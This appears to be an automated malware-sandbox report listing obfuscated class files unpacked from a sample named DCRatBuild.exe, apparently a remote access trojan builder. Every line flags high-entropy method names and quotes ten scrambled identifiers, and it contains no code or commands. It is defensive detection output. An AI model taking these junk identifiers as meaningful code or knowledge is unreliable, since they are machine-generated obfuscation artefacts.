            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, TSCIaOIx0hjXyskiOq5.csHigh entropy of concatenated method names: 'BTdf9wDFtY', 'tAeJwxJq9X9sxWq8KKe', 'pHreMYJIkvgc4HRTieE', 'nNAUGTJAvrlW3m0D0yF', 'Wi2dcRJVBSeLYZrvcYH', 'aTKkkjJig1t7aLxGfnr', 'CRZCp0J9iataktcN8GI', 'wuDpcEJGts35NaGy0Hy', 'P5EClyJxwHfn33aHJgd', 'V7TV2VJf9EFDkahlwn5'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, SNXm4AfNO4hHNLDNgqm.csHigh entropy of concatenated method names: 'Q312oJfgSS', 'BPc2F80yES', 'h1n2WtY4VP', 'gso29kZC3O', 'X822vCxcBt', 'nTqTLTD9umBK5olGtMj', 'gJW8XiDGRjilqvu4Udk', 'vrcYbXDIbNOgvdNblqX', 'A9tUegDiTDlqaxiF56f', 'uewS4hDx4YgWyHIhm4f'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, glEcPYQ8T2A99AIlRUf.csHigh entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, A3uninIyfN0hCy6qBF2.csHigh entropy of concatenated method names: 'baQf8M7axU', 'y3PfD0MIOf', 'nv8epcJZUH2dXIsESty', 'd8APL4JynNn8BqTvEvj', 'nhkS9gJP7R73rSLbuml', 'OTdjaOJDfbwqpwcTnTL', 'F6PJkoJgYijOCsJ5Wod', 'VHyY9lJ8WhvubGGVRdR', 'BeYok5JnT2RVSIG7DiV', 'rI0veKJ4BDfBEF9bLFt'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, aW2pwAnWLDFJi0UpVKV.csHigh entropy of concatenated method names: 'ToTRQhwWHH', 'rwLRnAItTJ', 'K7cRm22Jb4', 'aYHRYTfHSk', 'EsfR2O60eB', 'OAPR6d5CFP', 'uxmRsCZaO9', 'VLURayjhrt', 'NtlRulA98H', 'DcnRPZuDaF'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, dpYdqsmwElxsgcqBAx7.csHigh entropy of concatenated method names: 'c7y3c9lS70', '_1kO', '_9v4', '_294', 'dj734u3MpN', 'euj', 'JnE3Ah6vAO', 'j8o3RyIFjD', 'o87', 'q9Z3OMHgsF'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, jBCUvq1VlYREnO5m9Im.csHigh entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'OAQHMdxnTfhS6UKsR6I', 'bSTJxDx4paN9qDsg31b', 'rj6IWYxNxO8k6F7DmMh', 'W410RqxF5lN5AuK5mNE', 'jOGaOHxTiwpIXZ1eQVV', 'nRYwGFx7B4JotmiPujP'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, OvSKO71awqCseY3EYhf.csHigh entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'A1iOTcGZCdWHsqceUYG', 'BXQEQOGy5LnTc4jh4Sc', 'uVguPtGP6kfm3fdu3oo', 'mpCoSPGDd5fdATiqD6d', 'A5jE6CGg671QPYs3SpK', 'Q5c0RkG8WVRNH8d6SO9'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, p3tsfvIMgVWhQdF90Fr.csHigh entropy of concatenated method names: 'sjdm2vo2lM', 'E94m68SqGl', 'kKRgXeO5jRJ2kmmEyZU', 'kJkHNsOs71TQavoRt7v', 'Rk4u43Oan6Mih2wsTMP', 'qPGGryOr7Sk9awptDLT', 'p5GmyXlVTh', 'HqeYrABHW9wr2YlAIEi', 'RSNARBBAhwlGJnIRHid', 'UswXJXOdJjWg4YqbMdw'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, suG3iw1ri6A9xseaA2N.csHigh entropy of concatenated method names: 'Xee1qoy5cR', 'wSLO2a6VEUuqOY4G3qw', 'ichAmb6qX8puZpxfIhg', 'mq0vIO6H15yXhn7e3tK', 'YuLjij6AfEu26DtUsij', 'h8RDkg6IIgTnT0ArO6V', 'oxIPue6ioB4Xv91maHn', 'ASYf4i69N4rvVK7Yyyn', 'anI1dt8oXN', 'XdmLBm6fCimSZoUpbIX'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, UsPvByz6Qq2KO8H1Wy.csHigh entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'Vs3IIT9qnJZowE7HO8T', 'BiWmhR9IASeHKPlRkgH', 'UrxNjt9iwmpxU3E0amu', 'k05mbV99Q3kli1KdnVs', 'o8ye1L9Gkb7snPQoCeq', 'RadlNo9xx2nisdDYLeY'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, JL2nwxn683rRYjWH3Ib.csHigh entropy of concatenated method names: 'V1QAtatDVA', 'hk7A5Eh0OC', 'Mt8J1QErDwiG5Du4xVn', 'Kfkkh9E5xsGTKiM4txq', 'IWMB22EshYNdMO4ea9g', 'IBRV1uEkNk5dRKmZffa', 'sVSL9IE2Ehtq4k1I2Cm', 'qK8XXhEdRy8OQGiyDwj', 'u8Ee4sEzaUG3nMOYiXQ', 'NvSoTCeHpORBQlabJ5p'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, JaAlfifpDrx5IUw2U78.csHigh entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'RMIsakpWGE', 'luVMwGlBUa', 'TDVsuTgsSm', 'rC5MN3AuXb', 'xLUPWs8LacFdxcbF6sO', 'fKZHAH8uJP3WmgKrTfQ', 'hfhyqI8EpagNUInAe5U'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, pqlU0xYC9WBKkseoZ1.csHigh entropy of concatenated method names: 'NU0exC9WB', 'Iy5bJIC8RfsnSkT1gF', 'YRt4qe3k8igRJEpLr6', 'Yrh0hmhcjkyC4hhZkY', 'exhYp9bAGjCKs0cLDC', 'ywo2mEvrqLJq0opI0h', 'DxZIxP4vE', 'q0efMdkkA', 'jbtQuORBn', 'JB8n5OUk9'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, Bgn2UD1g7350nNQAMGI.csHigh entropy of concatenated method names: 'Dub189IZUn', 'PMD3So6en8uENUqnlWi', 'lDmLHA6LoSZ59MrwsQW', 'lwaUQk6v0nqf6LHMWMp', 'JIlfw96EsnZG7SmkW5p', 'iIKWvl6u3PZpGH8JGqh', '_3Xh', 'YZ8', '_123', 'G9C'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, nyPRrcQHsZGD5KYLPEA.csHigh entropy of concatenated method names: 'u6ne060nJ4', 'yMZeGKCCcn', 'AXmeBiHbIi', 'JbEe7yuWQo', 'x4VegvBGtt', 'ekS4JUFZYmaNUtnl19d', 'UZvAgxFOdUB1n87WQ65', 'vwcwG8FBY25HvdEFm75', 'u5ISWmFyTKU5DopN2pY', 'uGMvnTFPga48wsFaYD2'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, raqxiEBM8xrpHatTvQ.csHigh entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'x2g5ZwV2EfmVK0cjEwg', 'M3xGf6VdEp65QIVDVE3', 'lovNksVzAXmEZQ1XlCX', 'tbP0xRqHQ7qQ6YtL8Ze', 'IfW0NrqAk8TB3xHH9in', 'KuRIDZqVibpr5PMl8op'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, zb2UlpFHkSTklRr5oa.csHigh entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'imO1EIiTY9VlnKhhhpq', 'QnRjL7i7JZXsMHwJAiS', 'hSpGGhiQMS1o5JQ3bjG', 'X9icePi3q4JqSgxvJXl', 'B25tGZihiQiWliEVKCh', 'cwQjSwiCPEp0fYkyCXp'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, FCkR8EQFLB9yQhURlYe.csHigh entropy of concatenated method names: 'uSyx8VHl4g', 'xxpxGaZNR7', 'fC2xBrQJn8', 'wvNx7Qv40l', 'TM9xgWepfv', 'txPxX4VSZe', 'R3vxM2nVsA', 'XkMxSV8HNU', 'XNhxhK0Wyx', 'IckxE7C8TG'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, b0aIlr1lNKlfGdpiHL4.csHigh entropy of concatenated method names: '_2WU', 'YZ8', '_743', 'G9C', 'fQZRXst9mb8Cgr4sAHM', 'LZ39ZVtGyrpkp2QV2U9', 'O6sdk7txedbASwhMbAK', 'P7hqxOtfx8YH1HKJiaF', 'ynHXpMtIEhrBaNNNIi2', 'Dnv4y8tigWoUkiTNj9D'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, QwDFtY1pFu4gKbdC1aQ.csHigh entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'OkigDFthGPcCPOkcRIc', 'HWgCvVtCwu2VRbBKxAW', 'So9yDmtbZEXua3SvkOF', 'hsccGPtvlMTqdMFfxd2', 'IgaJ5ttEd9mvVxyoEPZ', 'HeDok7te5Lh5nQH2KrN'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, pgesf3fxl3jKT3XiUYg.csHigh entropy of concatenated method names: 'ksP2ELKdSt', 'r9y2l8b5ir', 'QPl2qsiWHl', 'HRH2C21JvU', 'brarpCPbG9xKcLP4XcL', 'U38adLPvIVwoAthQhcX', 'TfscWNPEGkRwwm7sj9c', 'AiopfiPhYGmNN4Ewsca', 'Mtoda0PCVNgsd3vhM19', 'mLIRRZPeKpjAMsEyMDy'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, ES9VhuIIPWkEdSlAEcd.csHigh entropy of concatenated method names: 'cdXId6KXri', 'C09IimXDNc', 'mSsIwI8Dln', 'hQTIp0Jjim', 'I0xIoJKZrH', 'GAjIFrMLKt', 'p9DZTSwOerxcHm72ckb', 'eEWCBdwBk4Co9ksJBx2', 'r1I5qrwjAs8QqM0TfZS', 'qdPMdgw0aI4xx9n4vOw'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, F4Aopy1FyJuFAfQL2hY.csHigh entropy of concatenated method names: '_589', 'YZ8', '_491', 'G9C', 'lA9cQltKMjDx8J9rFH9', 'w9gk8ctl1QmZGEb2hFE', 'nupsT8tUXSB3CVenfQn', 'OvWVVLta8MiVnJLLbj6', 'v88l4htroEdHxbSLrS4', 'E1ECdEt5JcBqZxcQwJF'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, WmXDNc1UxSsI8Dln6QT.csHigh entropy of concatenated method names: 'pQJ13Ijgo2', 'kNRj4rxO0TUX8dYVWTU', 'aJFwllxBPFkIdvMV9F6', 'JJ4LaIxjfZPQbZmhk2U', 'xZ8p3Tx0GVWZaMmkabP', 'xxikaZxZrf00HFEAM9D', 'kENb2jxyHY86BprDemH', 'JU9CtqxPgnDnV07Plsc', 'yWFLtZxDS4fPQbUEsD0', 'f28'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, TDM4eGnvylMYY0i1iZl.csHigh entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'cK9R4uClV7', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, T8FCuuYe5ynxfEF8Wit.csHigh entropy of concatenated method names: 'Icmbxi1N5VAD1FA9FEX', 'cOPJtg1FF6AgyNnn0U0', 'eOSU7I1nD4k5F0Upwe7', 'z04hWk14PsEsauJ3Z5H', 'x8gJxBASGU', 'MqqprI1QtBWpqGrh5DW', 'pewtrh13NfJNfT82Ew2', 'cECWjO1hKOjXrWvd3yf', 'zdrBUs1CUIg3jDqxxNQ', 'wpb10h1b3T616tJ2R9j'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, ecCseonHGRAM7nMCQuY.csHigh entropy of concatenated method names: 'E5rAXNBINo', 'X7mAM7RjJe', 'bJtASk8fik', 'KDFAhXr5dS', 'yqiAEVL7U7', 'RxpZx4eTmVaKKkHOAwn', 'y1ho8ceNvrm6UumrUXV', 'g5WZZqeF9231lJ5jdMo', 'dDRPYVe7sqT2LKxciNL', 'nkl36teQDkaUOASc4qE'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, VbYre3ItnDaBentHBJ1.csHigh entropy of concatenated method names: 'MVqQeooD7o', 'MAXQxIUo6h', 'egVHYXMntKf2hAbhLbQ', 'b03CgZM4Oq8c57tJy5e', 'dBYWCZMgTvmGcwJcwEY', 'pmlJ1JM8B5d6T3srd01', 'TlAFoLMNnl9Z9OEGlNp', 'LF65UFMFQw4yl6VH9Hg', 'HPOae1MT7mBtxLFAOLA', 'kQ9yODM7NXyHvCjl5BS'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, vLWq6a1fkX3BiEZNZmC.csHigh entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'IU3f6o9QiNFDqtUChon', 'polnQO93B5NogEqr6qn', 'xOqQ2D9hdZycQXBVFiJ', 'iOKsDW9CliptaGPRfnn', 'WVuPHY9b5IhGLnPSqey', 'D63VP59vm7AuO3DoYY4'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, lKZw0slmlIFpBCgcl8.csHigh entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'qIyhlFIOgkVn665MPMF', 'hJ7duqIBxpF5j9kWvxu', 'AwsHGhIZXNhiZIgt5nX', 'XwPjaxIyLw8DbIBaRBa', 'tMZwSDIPNoHKHGAeLKb', 'tGvI8TIDhRLeMBG45kP'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, WMM0Lumd6uwhVVio1lC.csHigh entropy of concatenated method names: 'jHR', 'B92', 'TrdEqGpdkP50TLUIWYe', 'yYsnUKpzZmEB0VcH08a', 'DcbfuNRH0wLoaedCxok', 'IigBVORAiKnX7DX6om9'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, jkaYrcIGc3fBw3eT0tG.csHigh entropy of concatenated method names: 'xakn3aYrcc', 'N2Xw1U02jUL28sQEpQn', 'k6pStZ0dGMGk91heag9', 'BFuiyP0sFhWpjSFJEyo', 'AQZB900k0GGTnRa99RM', 'Jp8OKZ0z5XOETS8sW2k', 'pTDFtfOHckNCs8YhDlp', 'GFebjMOAF80qKf9vX2Z', 'ycBkTaOVvD0OShduTkO', 'bTXZwbOqBMlAHE18TCn'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, kgU2L01xSqwEVNQawjm.csHigh entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'M3Ku4CGuEOYkSoe2yqM', 'JvejMLGSZivfoffPYdI', 'rTGgdxGXhBRgjvCjakw', 'NvN2QTGoqgwxgiiqo3B', 'cibrYCGpsMyxl8ZaB60', 'ux7jq5GRZNMWm1yb7dj'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, OZEmyGmIOayneMgFHhS.csHigh entropy of concatenated method names: 'GPqO2UXOpe', 'dcPO6umq6M', '_8r1', 'DEGOsdMrBd', 'NK0OaSFR4o', 'fMIOu5fwM3', 'EjfOPJHv98', 'Bsx0gMSjuSrjB4VRZVI', 'ui78YUS0I4WY3oU0sZB', 'RFvWUgSOMybm9uuwWyY'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, PqLZKvmV9XAXm90IcWr.csHigh entropy of concatenated method names: 'WbNOteAVGr', 'm9LO5B6jFN', 'yA7OV1d9xt', 'iktOcyj7Rn', 'QaHO433t7K', 'CNHrl0SkpLja8rU3nxW', 'RqDFC7S2FR7AIap7v7H', 'yrgjM0SdRhPoTHV0Px6', 't3gM3HSzNhvrd87qwBF', 'GD4D2sXHRdsiw6Zxcrd'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, ktxd7lm7Ku4apr8eUvK.csHigh entropy of concatenated method names: 'ShUjgEiKmW', 'Mxw9CkpQFc9k42yXGhl', 'qvXDbCp33pwaitCR6es', 'gowVthpTqeJhAxYn5FC', 'WlKaBpp7JBwrV3qSS7q', '_1fi', 'Wg2kpTgQfm', '_676', 'IG9', 'mdP'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, e2u35lmjE2fSn6mMUxR.csHigh entropy of concatenated method names: 'XN8H6fBXqr', 'ggRHsBYPJX', 'eykHaU4vFA', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'WvtHu5Xc0R'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, jC5YDdYRWTYmuTqCgBB.csHigh entropy of concatenated method names: 'j1nJAyKLS7', 'X8aJRyygjN', 'ue4JO4RdUv', 'GtmJHEPFnv', 'a4VJk47tkC', 'y3tJj1pdIy', 'EiVJ3b69Zt', 's9OJrntv29', 'LcMJJUoAPp', 'OJRJTakh0v'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, mA6HgIIgOZBxSY3Ekw7.csHigh entropy of concatenated method names: '_0023Nn', 'Dispose', 'gkknGdEuJ1', 'bTMnBkeA6H', 'IIOn7ZBxSY', 'CEkngw7hoN', 'FB5nXncR73', 'BLXTOoOfASdHZ7rkgTG', 'RBTlRvO6C9vLhTRPcJJ', 'CEvL1vOG7G3MBLqve9G'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, r7i0W3fz2BIDP0XuyDI.csHigh entropy of concatenated method names: 'LtYsklEcPY', 'E2Asj99AIl', 'yUfs3mcfo2', 'DGolCpnX5jLHjNT7fbZ', 'cLd0b0noTXcS6D9EZZr', 'GatOtPnuOP9yABO06RG', 'R4OHcEnSJ6YHKiJ9oLi', 'be2SJ2npXXPIc5eXGgO', 'uXLxBfnRCcWeN4hYrcG', 'uHdHxLn1EAUUdrsE1Zx'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, aZnlhm1CAABsIa9RBQ2.csHigh entropy of concatenated method names: 'EJwIaXW42A', 'NnOIubpbjR', 'wYPVBrtc5Q2K2ug61DZ', 'MrwwJYt6VEeANJv8Doa', 'NTRlEOttkt09XfohFXG', 'hio4UptwbT7Gc8molDN', 'dSTQ6htYJqanOJr0fFb', 'SUKND6tJfHeVP6wtbqv', 'aJjc2FtML5N4pXdIgdb', 'BxV2j0tjfGy5WfgLO3K'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, srIwKrfPo6FATXUxSkB.csHigh entropy of concatenated method names: '_223', 'cgc9QePOZVnR3d1k26d', 'wy9vc2PBYxJGKBCdNMr', 'u0XPsTPZD91u1RFPKFB', 'V9TyHfPyHM47E5F2syu', 'xGEZEbPPiyyy2d68vib', 'htgJ2UPDHE5GWHdTtor', 'oedJQdPgZQKt7kccoBf', 'Vn4lN5P8wrMRLmmD2GP', 'DUPaFlPnhoUx24bMYYT'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, RZAd3wJJfGDG5KqnCW.csHigh entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'ffIMOJ06G', 'XnZ5jVVZT6qwrPnSldY', 'q5x4a4VyHsBna1VCQNk', 'QcOJuSVP9CZ46oNPWTx', 'gMn6qSVDpm0aqC5I77D', 'skSfnyVg6FBG6ypoiwQ'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, HjYabonTIyjxbiXVBGl.csHigh entropy of concatenated method names: 'AN8AoN5ZNp', 'wuuAFQiPZe', 'ST7AWnKxFn', 'iCFA95NnHP', 'k6oAvKW7xu', 'k7rA8XGf9K', 'FsMNM7eWujE7CiZ8rSY', 'zUTOBie1oN5xcZnYJgk', 'asty0GemIqvPtjht94G', 'FsDW5peKLLlFJZyTO9b'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, EvMIiDYaSphYYhce8T7.csHigh entropy of concatenated method names: 'f4Z1oiaaCm2bg', 'DZxoq51Mlx5r19Aie2K', 'UerLZx1jeCPGBGnkYEK', 'Kjqrha105wRa2HbXq7k', 'XGt4NV1OFh1eohgKDbE', 'Rct8jH1B5ffZEvmj7Mt', 'oGt2OY1YM7PMVTOQYoa', 'n1wGWW1JeCLFACjRGga', 'BhwDBE1ZGPL5el9vkdv', 'XqVWmk1ygfqnHjpjRGN'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, hcK7ZnpIt8oXNoR1tX.csHigh entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'N6Cxw1iMQLm8wDtdJEW', 'lQ102Oij0ejNjlKscLB', 'tnUYebi02LcFuJHiCYC', 'F2i0l7iOL5x1luqfGNG', 'd2jf38iBEElYqFrpy59', 'dDdUO9iZv0q3IN7yrSe'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, IM8Y0yfV22qvhg5kTZs.csHigh entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'WwIPFWgYHx4byVr2Oma', 'cJjvrxgJ9VJOLTMwtJn', 'mp40EqgMTS4mVHiMdsD', 'c47BekgjB9eVVthL9gT'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, JSvtCM9rFJub9IZUnS.csHigh entropy of concatenated method names: '_88Z', 'YZ8', 'ffV', 'G9C', 'xj4qtciRgPKcw4hnJep', 'zyAxmji1fnHQtm1jquq', 'jXOmivimdRycNEX978W', 'FLdNuZiWTaZcmscJmeG', 'HR5sswiK64Prw6YbN2X', 'EjxvFlilUsQw0nNaZKa'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, U4xZGS164cWf1h1WGxW.csHigh entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'hHpYBgGGFggemeCeWTq', 'Y0dt5lGxlh6GSwoijqs', 'unThmIGf9oiKixdnN3i', 'Hwl8myG64vx4XSf8aYP', 'QxTClRGtfkarlsDDLCS', 'uRukqhGcwhyJOAryZdq'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, EJRA9hmJvApynMht73d.csHigh entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'moHHRidBtv', 'gPYHOt46DU', 'dFZHHFU4SN', 'mq0HkN1Aeq', 'wBmHjp5STh', 'rAIH3p9yll', 'GA1luyoedkbPQcAPMS3'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, dbRMeXQ575SOntb20Eg.csHigh entropy of concatenated method names: 'qsIP09rA2j', 'V9pPGUU2an', 'Ak5PBRkm1U', 'qGBP7inca6', 'aCuPgQb2ek', 'H36LBVNvglFNMOmiTEw', 'PNsWeXNEFlD8lyyHqXR', 'A4ufZENCcHEjZgnguo7', 'hB8HUoNb78xF4dwKCmN', 'dn1dw6NeCLeV6TZCqBv'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, LmSC3EI6jv3Pr2T55hN.csHigh entropy of concatenated method names: 'bjNfTqblQk', 'GT4f024FK9', 'uQFfGjqxWi', 'ykKfBv1aHI', 'UUDf7AJCNO', 'B1Efg3RBNf', 'XHtfX5PcKN', 'TXyhbQYnRe9U2XoOrcR', 'MMaWn5YgspJ3kjWw9il', 'uyY8p0Y8FlPvHnhAFMm'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, pXRCpH19vFMMQuFLeUx.csHigh entropy of concatenated method names: 'M91IU9OQ5W', 'rYmJegc9pRmLH8HhWNp', 'lb2iWbcGQmL9eHTJV2X', 'tccFqlcIJuYtXM6bI7e', 'EGZVe7cifjCAecvF7pN', 'pXNsJScxM6s4q1suTUk', '_5q7', 'YZ8', '_6kf', 'G9C'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, nC1gEDfhZmYk9QTj1vI.csHigh entropy of concatenated method names: 'sg9', 'ofGMPvZqkC', 'RZa68BL7vs', 'SbeMDYFjfA', 'J0spPKgW43vSa9ig6qV', 'sC1aCrgK8Wwfufu3mXc', 'xuZXrHglL1vNP9kcb3E', 'mtSDhBg1Q4E9YWwEolj', 'mKcySygmwF3661WVBUI', 'TejAsKgUUYlHMgpS8W1'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, xOoR8N1HhDLW5mmEXKP.csHigh entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'NSX20hxd3wR8UjWme4T', 'to8d8ZxzCE4jwvSKx0x', 'RMxgEkfHM55sa2CYSJy', 'V26Le3fA5HJa6GFTWSP', 'dV5OcVfVfXilBNokZdj', 'tvbcpafqvVGJtPJrvrY'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, nYKMMv1GLcBgbNJplvJ.csHigh entropy of concatenated method names: 'AlR1Fr5oaU', 'Jb0sta6nvj947ZHOaYo', 'SWsdVv64GKEm1e9kdZL', 'fX49MM6g8RX9Acyl36J', 'qhlMJj68dAQiwCc5UTg', 'XjYp9M6NEBD1fQ7iFFm', 'QLw', 'YZ8', 'cC5', 'G9C'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, yQ5WGN1Y6EM87nG9LHI.csHigh entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'cNIEEM95nX3FJlLZugV', 'fDEpLR9sGOSSEvkrGTi', 'TMpRyW9kjpikJKkykem', 'sUtGVJ92yHYZIilquOP', 'of4hQm9dBqwbv9OAVyw', 'TmO2lk9zVqI7QGq9w2d'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, W4WPSscSdKwTg6HOgj.csHigh entropy of concatenated method names: 'CstAndi1w', 'BZkRDZ6XI', 'lbaOKSunj', 'OT5HGpnEc', 'fl5kKabUB', 'rGwjUFYoY', 'xNR35IwfR', 'XVdbc3Axr3mNnikaOv9', 'U2IflCAffMg5oors7pW', 'nUpjr2A6MFtjjGrSWWb'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, uWENbonr8jd1tIAS1xn.csHigh entropy of concatenated method names: 'CvxAdv7Hq1', 'gKHAiCXYkU', 'LR8AwfngFw', 'hHim39eSeYNMFeUU8kO', 'pdibRleLY5VcwkOgAvO', 'dM41eyeuXcHRkJbZ9PT', 'jKrYWPeXGjTp8cyVo7v', 'wYVT51eokogZFb3OGB9', 'lKixj8ep8UNxdeFCUcX', 'xHAN6teRE8rJRo71WQY'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, jE5WtPml1RdQjdFQ8DA.csHigh entropy of concatenated method names: 'PJ1', 'jo3', 'YVe36uBscA', 'FV13sNS1ip', 'nFr3aXIbYS', 'EC9', '_74a', '_8pl', '_27D', '_524'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, iROHQ3mmEIfL5S674q7.csHigh entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, yWutIw1jxXL5qX4CDYU.csHigh entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'FvbnJXfEI3kdZRkJAYQ', 'BcwGjNfeuWgHgxc0fk6', 'VhCPMYfL1Zrxnk5TLME', 'O7ZiQbfufBpeJpqsc0C', 'e9MkMdfSwgZSEF4dYWU', 'YDiYhQfXkG3oafd4wQF'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, H7npMFILkHSORxw2N45.csHigh entropy of concatenated method names: 'HxOfzW04Ao', 'SyyQZJuFAf', 'dL2Q1hYJGm', 'f9kQIoCKW6', 'vSQQffZLyX', 'yCpQQHvFMM', 'duFQnLeUx5', 'DU9QmJg36L', 'ARhQYCqrb9', 'f5uQ2U70Hc'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, rQuI3Fm0ST2JYPvCrjv.csHigh entropy of concatenated method names: 'JN41JVpIZESMcdZ3EbH', 'acIbnTpipqyx6Ul6tT2', 's2yX9NpVtplZ0rK2odG', 'Ut91mwpqeWMX102mIcu', 'ovmHGFPu5D', 'WM4', '_499', 'UEyHBlXkqw', 'ussH7OQju6', 'hNJHgR9lIm'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, CudyvdfljsVS7HSNSDB.csHigh entropy of concatenated method names: '_5u9', 'NSoMmYZ9Ja', 'VbqsZWovWm', 'fUJMxvrwqP', 'ncPZjKgkkJvPEK5KrYI', 'afKcfgg2AUN4qQ6gLvK', 'sAQg86gdVX2A1LWERcW', 'KGR2Lwg5U553O4eFoQP', 'eFhx9Sgs2mDwbCQ51V0', 'kewxoqgzySOfltPMIyW'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, GvNNiUIcgHqlnAdBYvR.csHigh entropy of concatenated method names: 'U04Q5L7XgJ', 'syuQVOSMHG', 'lWqQc9N5wI', 'oGSQ4WI0BB', 'rO3QAUI9Lg', 'WjXkAojH8Raa2BD7mnf', 'Is2h10jACVqouXJaUaF', 'Wy7kryMdBFyhkiMwOau', 'CZ2SapMzPfwC3p5W79F', 'yJgQwXjVxmdQSPgD1j3'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, kkt7FX1bTdGrWt8uukE.csHigh entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'NgLQk7GajK8kdI9lH18', 'D279kvGrKsfpYwPjpak', 'FliTSiG5YipVfe3It5l', 'FSlt61GsWUiLgao1Lyw', 'AauqyaGkFij4T1Vo2eh', 'pNGao2G27dYZFhj469v'
